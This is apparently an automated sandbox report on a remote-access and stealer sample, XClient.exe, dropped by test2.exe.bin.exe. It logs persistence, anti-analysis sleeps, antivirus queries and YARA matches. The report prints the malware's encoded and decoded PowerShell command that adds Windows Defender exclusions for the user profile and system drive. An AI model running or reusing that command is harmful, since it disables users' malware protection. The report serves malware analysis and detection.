              Source: test.3.dr, xuigMhegpDWb7LyFrukanLGTDbKK1mTJMDADPB9Vz5qijEgBZbzo72QwF7mNBkuarMQ9LipLOQXs5xBkPhs96tO.cs High entropy of concatenated method names: 'fk5LEgK7V2M3Hd149MjNFpfBZMY7yDzfMnatgVqrXr4zOIYIMEuPC2meTY0zUtUnnhnWwc2PlydoWivaE2lUSNV', 'QdgYZBpeJQLNoNPSSSpUt0LD2lSaP3SuPdDmPNzFBNaIb5s', 'aPs5pNPwlUAmCT43hITfLsEFpH21qsblBeCsZhyHWyhyOzY', 'ZqNDMvGPRADzq7RjcJkjZlJ34C3ar2ptOVzBZgPJC7276VL', 'iFkpACBewAllh3bnBTSG0AtnPyVKhvaNVXyFYyIyFdqy923'
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe File created: C:\Users\user\AppData\Local\Temp\test
              Source: C:\Users\user\Desktop\test2.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\XClient.exe
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run test

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\test2.exe.bin.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\OpenWith.exe  Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  Memory allocated: 8E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  Memory allocated: 1A410000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5967
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2210
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  Window / User API: threadDelayed 7082
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  Window / User API: threadDelayed 2567
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe  Window / User API: threadDelayed 9569
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020  Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852  Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8292  Thread sleep time: -36893488147419080s >= -30000s
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100  Thread sleep count: 9569 > 30
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100  Thread sleep time: -826761600000s >= -30000s
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100  Thread sleep time: -86399999s >= -30000s
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100  Thread sleep count: 144 > 30
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100  Thread sleep time: -12441600000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 1020  Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 8772  Thread sleep time: -30000s >= -30000s
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe  File opened: PhysicalDrive0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Last function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  Thread delayed: delay time: 922337203685477
              Source: XClient.exe, 00000003.00000002.3626778140.000000001B440000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
              Source: svchost.exe, 00000007.00000002.2859563863.000002CC65E2B000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWp
              Source: svchost.exe, 00000007.00000002.2862716448.000002CC6B45A000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
              Source: Music.UI.exe, 00000004.00000002.3631595501.000002CCD83E1000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  Process token adjusted: Debug
              Source: C:\Users\user\Desktop\test2.exe.bin.exe  Code function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit  0_2_004014D1
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe  Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\test2.exe.bin.exe  Process created: Base64 decoded <#dfc#>Add-MpPreference <#zby#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#nvw#> -Force <#vcn#>
              Source: C:\Users\user\Desktop\test2.exe.bin.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA="
              Source: C:\Users\user\Desktop\test2.exe.bin.exe  Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
              Source: C:\Users\user\Desktop\test2.exe.bin.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqazgbjacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahoaygb5acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4adgb3acmapgagac0argbvahiaywblacaapaajahyaywbuacmapga="
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqazgbjacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahoaygb5acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4adgb3acmapgagac0argbvahiaywblacaapaajahyaywbuacmapga="Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00001.jrs VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00002.jrs VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.jfm VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\tmp.edb VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
              Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: XClient.exe, 00000003.00000002.3626778140.000000001B47E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s Defender\MsMpeng.exe
              Source: XClient.exe, 00000003.00000002.3626778140.000000001B440000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.3626778140.000000001B4D5000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.3626778140.000000001B47E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara matchFile source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: test2.exe.bin.exe PID: 7744, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 7840, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\test, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED

              Remote Access Functionality

              Source: Yara matchFile source: 3.0.XClient.exe.190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: test2.exe.bin.exe PID: 7744, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 7840, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\test, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED

MITRE ATT&CK Matrix

Techniques listed per tactic column; leading digits are the report's own count badges, kept as they appear.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
